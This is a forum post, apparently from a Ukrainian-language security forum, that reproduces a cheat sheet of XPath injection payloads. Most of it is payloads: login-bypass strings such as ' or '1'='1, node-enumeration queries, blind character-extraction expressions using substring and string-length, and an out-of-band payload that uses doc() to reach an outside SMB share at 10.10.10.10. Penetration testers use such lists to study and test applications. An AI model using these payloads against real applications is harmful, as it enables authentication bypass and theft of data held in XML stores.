Що нового?

Cheat Sheet XPath Injection - Payload List

Vander 0

Vander

Команда форуму
10 Лис 2019
477
1,160
1598469682204.png

XPath Injection - это метод атаки, используемый для использования приложений, которые создают запросы XPath (XML Path Language) из вводимых пользователем данных для запроса или навигации по XML-документам.

Exploitation

Аналогично SQL: "string (// user [name / text () = '" + vuln_var1 + "' and password / text () =’ "+ vuln_var1 +" '] / account / text ()) "

Код:
' or '1'='1
' or ''='
x' or 1=1 or 'x'='y
/
//
//*
*/*
@*
count(/child::node())
x' or name()='username' or 'x'='y
' and count(/*)=1 and '1'='1
' and count(/@*)=1 and '1'='1
' and count(/comment())=1 and '1'='1
search=')] | //user/*[contains(*,'
search=Har') and contains(../password,'c
search=Har') and starts-with(../password,'c
Blind Exploitation

Размер строки:

Код:
and string-length(account)=SIZE_INT
Извлечение символов:

Код:
substring(//user[userid=5]/username,2,1)=CHAR_HERE
substring(//user[userid=5]/username,2,1)=codepoints-to-string(INT_ORD_CHAR_HERE)
Out Of Band Exploitation

Код:
http://example.com/?title=Foundation&type=*&rent_days=* and doc('//10.10.10.10/SHARE')
Tools
Материалы для изучения
 
Угорі Унизу